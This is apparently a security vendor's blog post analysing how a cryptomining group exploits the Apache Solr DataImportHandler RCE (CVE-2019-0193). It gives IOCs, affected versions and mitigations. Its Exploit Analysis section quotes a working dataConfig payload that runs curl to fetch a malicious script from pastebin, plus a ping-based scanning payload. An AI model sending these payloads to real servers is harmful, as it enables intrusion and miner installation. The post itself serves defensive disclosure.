×
Community Blog Solr Dataimport Vulnerability Becomes a New Attack Method for Mining Organizations

Solr Dataimport Vulnerability Becomes a New Attack Method for Mining Organizations

Alibaba Cloud security team has detected a new attack method using the Solr dataimport RCE vulnerability (CVE-2019-0193) that implants mining programs into target hosts.

Summary

Recently, Alibaba Cloud security team has detected that the mining organization using the Solr dataimport RCE vulnerability(CVE-2019-0193) as a new attack method and implant a mining program into the target hosts. The malicious script used by the organization is basically the same as that used in the previously reported article[1]. Therefore, this attack can be considered as the same organization.

Besides, it can be reasonably assumed that this organization has been active in finding new ways to attack. Alibaba Cloud security team has been monitoring for the first time and continues to pay attention to the behavior of the organization.

Alibaba Cloud security team recommends that users check if their hosts are affected in time and focus on related articles.

Vulnerability Details

Apache Solr is the popular, blazing fast open source enterprise search platform from the Apache Lucene project. Its major features include powerful full-text search, hit highlighting, faceted search, dynamic clustering, database integration, rich document handling, and geospatial search.

Remote Code Execution via DataImportHandler (CVE-2019-0193) is a vulnerability warning disclosed by apache Solr on 2019.8.1. This vulnerability occurs in Solr's DataImportHandler (DIH) module, which provides the ability to retrieve data from a database or other data source. Since Solr admin does not require authentication by default and DIH supports script operations, remote command execution can be implemented by constructing a malicious HTTP request.

As shown below, select the dataimport tab in Solr admin. Since the dataimport configuration supports scripts, we can construct malicious scripts in the configuration file and execute the curl xxx.xxx.xxx.xx command.

Solr  dataimport

As shown in the figure below, our server received the HTTP request sent by Solr and that RCE was successful.

RCE  result

Exploit Analysis

Alibaba Cloud security team recently detected attackers trying to exploit this vulnerability to intrude hosts on Alibaba Cloud. It first sends a request like http://xx.xx.xx.xx:8983/solr/admin/cores?action=STATUS&wt=json to get all names of the core in Solr.

get  core  names

The attackers then traverse these core names and attempt to send the following payload to corename/dataimport to request a malicious script from https://pastebin.com/raw/jjFzjCwx.

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=<dataConfig>
+<dataSource+type="URLDataSource" />
+<script><![CDATA[
+++++++++function+poc(){+java.lang.Runtime.getRuntime().exec("curl+-fsSL+https://pastebin.com/raw/jjFzjCwx+-o+/tmp/baby");
+++++++++}
+]]></script>
+<document>
+++<entity+name="stackoverflow"
+++++++++++url="https://stackoverflow.com/feeds/tag/solr"
+++++++++++processor="XPathEntityProcessor"
+++++++++++forEach="/feed"
+++++++++++transformer="script:poc"+/>
+</document>
</dataConfig>&name=dataimport

Followed by the malicious script at https://pastebin.com/raw/jjFzjCwx, we found that it is only one different from the previous analysis of the watchdog mining program and is non-critical content, the latter part can refer to the previous article.

file diff

In addition, there are suspected ping commands to send malicious requests to collect vulnerable hosts:

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=solr&dataConfig=<dataConfig>
  <dataSource type="URLDataSource"/>
  <script>
    <![CDATA[
    function poc(row) {
      var Runtime = Java.type("java.lang.Runtime");
      Runtime.getRuntime().exec("ping -c 1 solr_CVE_2019_0193XfSIcGVY.awvsscan119.autoverify.cn");
      return row;
    }
    ]]></script>
 </dataConfig>

Vulnerability Influence

At present, the number of devices using Solr components in the whole network is about 19k, and Alibaba Cloud security team recommends that users check their machine status in time to prevent further expansion.

Solr Distribution

IOC

  1. https://pastebin.com/raw/jjFzjCwx
  2. https://pastebin.com/raw/3FDDiNwW
  3. https://pastebin.com/raw/KJcZ9HLL

Vulnerable Versions

  1. Before Solr 8.2.0 (not included)
  2. DataImportHandler module is enabled
  3. Solr authentication is not enabled or uses weak passwords

Security Recommendations

  1. Upgrade Solr to 8.2.0 or later (After the 8.2.0 version, the dataconfig parameter support is not enabled by default.)
  2. Empty solrconfig.xml->requestHandler->config tag content
  3. Whitelist filtering for DIH related requests

Reference Articles

  1. Warning|Watchbog mining worm upgrade, using multiple vulnerabilities such as Bluekeep RDP to gain momentum
  2. CVE-2019-0193 Remote Code Execution via DataImportHandler
0 0 0
Share on

Alibaba Cloud Security

22 posts | 12 followers

You may also like

Comments